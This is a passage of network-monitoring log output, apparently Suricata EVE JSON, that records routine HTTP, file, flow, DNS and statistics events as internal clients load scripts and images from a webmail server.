Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imagepoll.js","state":"CLOSED","stored":false,"size":1911,"tx_id":1}} {"timestamp":"2020-02-29T00:02:15.469894+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/editor.js","state":"CLOSED","stored":false,"size":2493,"tx_id":3}} {"timestamp":"2020-02-29T00:02:15.470165+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/draghandler.js","state":"CLOSED","stored":false,"size":2941,"tx_id":1}} {"timestamp":"2020-02-29T00:02:15.470467+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} {"timestamp":"2020-02-29T00:02:15.476978+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:02:15.478627+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.513326+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788}} {"timestamp":"2020-02-29T00:02:15.521234+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958}} {"timestamp":"2020-02-29T00:02:15.568491+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":9444,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.568785+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480}} {"timestamp":"2020-02-29T00:02:15.571258+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":4}} {"timestamp":"2020-02-29T00:02:15.571729+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253}} {"timestamp":"2020-02-29T00:02:15.573185+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/forward.png","state":"CLOSED","stored":false,"size":253,"tx_id":5}} {"timestamp":"2020-02-29T00:02:15.574651+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":3}} {"timestamp":"2020-02-29T00:02:15.574878+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:02:15.617354+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545}} {"timestamp":"2020-02-29T00:02:19.398695+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":4}} {"timestamp":"2020-02-29T00:02:19.399076+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124}} {"timestamp":"2020-02-29T00:02:20.000204+0000","event_type":"stats","stats":{"uptime":13792,"capture":{"kernel_packets":132471,"kernel_drops":0},"decoder":{"pkts":132561,"bytes":92010943,"invalid":179,"ipv4":131136,"ipv6":8,"ethernet":132561,"raw":0,"null":0,"sll":0,"tcp":126147,"udp":4796,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2668,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2684,"synack":2675,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1715,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2187,"failed_udp":106},"tx":{"http":4458,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2263}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":142595,"memcap":0}}} {"timestamp":"2020-02-29T00:02:20.465830+0000","flow_id":872675782682226,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52658,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imageupload.js","state":"CLOSED","stored":false,"size":2232,"tx_id":0}} {"timestamp":"2020-02-29T00:02:20.573829+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/drafts.png","state":"CLOSED","stored":false,"size":480,"tx_id":3}} {"timestamp":"2020-02-29T00:02:20.573923+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/attachment.png","state":"CLOSED","stored":false,"size":545,"tx_id":6}} {"timestamp":"2020-02-29T00:02:21.000172+0000","flow_id":985912589424072,"event_type":"flow","src_ip":"192.168.10.130","src_port":34688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":1975,"bytes_toclient":9919,"start":"2020-02-29T00:00:44.595400+0000","end":"2020-02-29T00:01:20.225407+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001655+0000","flow_id":876743112598001,"event_type":"flow","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":25,"pkts_toclient":27,"bytes_toserver":3953,"bytes_toclient":25164,"start":"2020-02-29T00:01:13.467441+0000","end":"2020-02-29T00:01:22.403062+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001892+0000","flow_id":1463401285748420,"event_type":"flow","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":14,"bytes_toserver":2601,"bytes_toclient":11271,"start":"2020-02-29T00:01:17.198340+0000","end":"2020-02-29T00:01:22.217976+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001995+0000","flow_id":1610366476737736,"event_type":"flow","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1978,"bytes_toclient":8886,"start":"2020-02-29T00:01:17.187592+0000","end":"2020-02-29T00:01:22.218168+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002101+0000","flow_id":788481534977091,"event_type":"flow","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":33,"pkts_toclient":40,"bytes_toserver":8697,"bytes_toclient":43206,"start":"2020-02-29T00:01:17.189507+0000","end":"2020-02-29T00:01:22.697610+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002194+0000","flow_id":948834138972290,"event_type":"flow","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":13,"bytes_toserver":2050,"bytes_toclient":12236,"start":"2020-02-29T00:01:17.188546+0000","end":"2020-02-29T00:01:22.218016+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002272+0000","flow_id":116207484000165,"event_type":"flow","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":40,"pkts_toclient":49,"bytes_toserver":10855,"bytes_toclient":46440,"start":"2020-02-29T00:01:17.186277+0000","end":"2020-02-29T00:01:22.699267+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.858656+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20600,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:23.964468+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43411,"proto":"UDP","dns":{"type":"answer","id":20600,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:23.964468+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43411,"proto":"UDP","dns":{"type":"answer","id":20600,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:24.117424+0000","flow_id":1530510154133066,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131}} {"timestamp":"2020-02-29T00:02:24.404100+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete-small.png","state":"CLOSED","stored":false,"size":124,"tx_id":5}} {"timestamp":"2020-02-29T00:02:27.000146+0000","event_type":"stats","stats":{"uptime":13799,"capture":{"kernel_packets":132584,"kernel_drops":0},"decoder":{"pkts":132593,"bytes":92021068,"invalid":179,"ipv4":131166,"ipv6":8,"ethernet":132593,"raw":0,"null":0,"sll":0,"tcp":126175,"udp":4798,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2669,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2685,"synack":2676,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1716,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2188,"failed_udp":106},"tx":{"http":4460,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2264}},"flow_mgr":{"closed_pruned":2648,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65528,"rows_empty":6,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20498,"memcap_state":0,"memcap_global":0},"http":{"memuse":54024,"memcap":0}}} {"timestamp":"2020-02-29T00:02:28.571788+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737}} {"timestamp":"2020-02-29T00:02:28.573297+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52664,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":1737,"tx_id":0}} {"timestamp":"2020-02-29T00:02:28.578970+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58895,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:28.617395+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:02:28.690397+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58895,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:28.690397+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58895,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:28.707225+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58896,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} 